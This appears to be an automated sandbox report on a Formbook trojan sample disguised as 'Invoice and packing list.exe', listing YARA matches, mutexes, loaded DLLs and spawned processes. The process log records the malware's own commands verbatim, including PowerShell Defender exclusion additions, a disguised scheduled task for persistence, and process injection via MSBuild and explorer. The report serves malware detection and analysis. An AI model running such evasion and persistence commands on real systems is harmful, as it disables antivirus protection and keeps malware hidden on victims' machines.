Source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.4504401224.000000000F929000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Invoice and packing list.exe PID: 4424, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: utlAHqvw.exe PID: 1856, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: MSBuild.exe PID: 7148, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 6580, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 5968, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: Invoice and packing list.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: utlAHqvw.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: explorer.exe, 0000000A.00000002.4504694781.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482370296.0000000003341000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4483360184.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: explorer.exe, 0000000A.00000002.4504694781.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482370296.0000000003341000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4483360184.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: explorer.exe, 0000000A.00000002.4504694781.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482370296.0000000003341000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4483360184.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: explorer.exe, 0000000A.00000002.4504694781.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482370296.0000000003341000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4483360184.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: *.sln
Source: explorer.exe, 0000000A.00000002.4504694781.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482370296.0000000003341000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4483360184.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: explorer.exe, 0000000A.00000002.4504694781.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482370296.0000000003341000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4483360184.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: /ignoreprojectextensions:.sln
Source: explorer.exe, 0000000A.00000002.4504694781.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482370296.0000000003341000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4483360184.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.

Source: classification engine

Classification label: mal100.troj.evad.winEXE@30/15@12/0

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_00D91CFC GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,		16_2_00D91CFC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_00D91C89 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,		16_2_00D91C89

Source: C:\Users\user\Desktop\Invoice and packing list.exe

File created: C:\Users\user\AppData\Roaming\utlAHqvw.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Mutant created: \Sessions\1\BaseNamedObjects\AaThLDPkmqOTiTNSErVydtnNnY

Source: C:\Users\user\Desktop\Invoice and packing list.exe

File created: C:\Users\user\AppData\Local\Temp\tmp2498.tmp

Jump to behavior

Source: Invoice and packing list.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Invoice and packing list.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Invoice and packing list.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Invoice and packing list.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"

Source: Invoice and packing list.exe	Virustotal: Detection: 55%
Source: Invoice and packing list.exe	ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\Invoice and packing list.exe

File read: C:\Users\user\Desktop\Invoice and packing list.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Invoice and packing list.exe "C:\Users\user\Desktop\Invoice and packing list.exe"
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice and packing list.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\utlAHqvw.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp2498.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\utlAHqvw.exe C:\Users\user\AppData\Roaming\utlAHqvw.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp36E8.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice and packing list.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\utlAHqvw.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp2498.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp36E8.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
